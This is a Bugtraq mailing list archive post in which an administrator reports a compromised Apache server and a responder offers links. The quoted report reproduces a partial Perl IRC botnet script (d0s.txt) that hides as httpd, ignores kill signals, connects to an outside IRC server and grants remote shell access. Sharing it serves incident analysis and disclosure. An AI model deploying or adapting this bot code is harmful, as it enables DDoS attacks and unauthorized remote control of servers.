Bugtraq mailing list archives
Re: Apache hacks (./atac, d0s.txt)
From: Daniel Cid <danielcid () yahoo com br>
Date: Sat, 30 Apr 2005 01:48:12 -0300 (ART)
Take a look at these links: http://lists.virus.org/full-disclosure-0412/msg00541.html http://seclists.org/lists/fulldisclosure/2005/Jan/0051.html Are your systems patched (apache) ? Do you run any application that might be vulnerable? One thing I know is that this perl script is crearly made by some brazilian people.. -- Daniel B. Cid, CISSP daniel.cid @ ( at ) gmail.com --- Andrew Y Ng <ayn () AndrewNg com> escreveu:
My server has been seeing some usual activities today, I don't have much time to get down to the bottom of things, but after I investigated briefly I have decided to disable PERL executable permission for www-data (Apache process's user), also locked /var/tmp so www-data cannot write to it. Looks like it ignores all the `kill` signals, not sure how I can actually kill it... I found the included script in /var/tmp called d0s.txt. I found a bunch of processes called ./atac 20 running, and found the following content in /tmp/atac: http://andrewng.com/tmp/atac.tbz here's d0s.txt: #!/usr/bin/perl ################ CONFIGURACAO
#################################################################
my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
#----------------------------------------------################################################
my $MODOME='+pi'; # Modo Do Bot #
#----------------------------------------------################################################
my $linas_max='10'; # Evita o flood :) depois de X linhas #
#----------------------------------------------################################################
my $sleep='3'; # ele dorme X segundos # ##################### IRC
#####################################################################
my @adms=("DDOS"); # Nick do administrador #
#----------------------------------------------################################################
my @canais=("#bots ddos");# Canais #
#----------------------------------------------################################################
my $nick='b0t'; # Nick do bot. Caso esteja em uso vai aparecer # # # aparecer com numero radonamico no final #
#----------------------------------------------################################################
my $ircname = 'b0t'; # User ID #
#----------------------------------------------################################################
my $realname = '4Admin14: 4#DDOS'; #
#----------------------------------------------################################################
$servidor='irc.gigachat.net' unless $servidor; # Servidor de irc que vai ser usado # # # caso não seja especificado no argumento #
#----------------------------------------------################################################
my $porta='6667'; # Porta do servidor de irc # ################ ACESSO A SHELL
###############################################################
my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
###############################################################################################
my $VERSAO = '1.0'; $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; use IO::Socket; use Socket; use IO::Select; chdir("/"); $servidor="$ARGV[0]" if $ARGV[0]; $0="$processo"."\0"x16;; my $pid=fork; exit if $pid; die "Problema com o fork: $!" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_cliente = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub conectar { my $meunick = $_[0]; my $servidor_con = $_[1]; my $porta_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_cliente->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; nick("$meunick"); sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); sleep 1; } } my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } delete($irc_servers{''}) if (defined($irc_servers{''})); &DCC::connections; my @ready = $sel_cliente->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $msg, 4096); if ($nread == 0) { $sel_cliente->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $msg); for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my $pn=$1; my $onde = $4; my $args = $5; if ($args =~ /^\001VERSION\001$/) { notice("$pn", "\001Bot powered by DDOS TEAM\001"); } if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { if ($onde eq "$meunick"){ shell("$pn", "$args"); } if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
=== message truncated === Yahoo! Acesso Grátis - Internet rápida e grátis. Instale o discador agora! http://br.acesso.yahoo.com/
Current thread:
- Re: Apache hacks (./atac, d0s.txt) a.list.address () gmail com (May 02)
- Re: Apache hacks (./atac, d0s.txt) Nick Bright (May 02)
- <Possible follow-ups>
- Re: Apache hacks (./atac, d0s.txt) Chris Umphress (May 02)
- Re: Apache hacks (./atac, d0s.txt) Sagiko (May 02)
- Re: Apache hacks (./atac, d0s.txt) Daniel Cid (May 02)
- Re: Apache hacks (./atac, d0s.txt) Luiz Henrique (May 02)
- Re: Apache hacks (./atac, d0s.txt) Skip Carter (May 02)
- Re: Apache hacks (./atac, d0s.txt) Robert Zilbauer (May 02)
- Re: Apache hacks (./atac, d0s.txt) KF (lists) (May 02)
- Re: Apache hacks (./atac, d0s.txt) Jay D. Dyson (May 02)
- Re: Apache hacks (./atac, d0s.txt) Steve Kemp (May 02)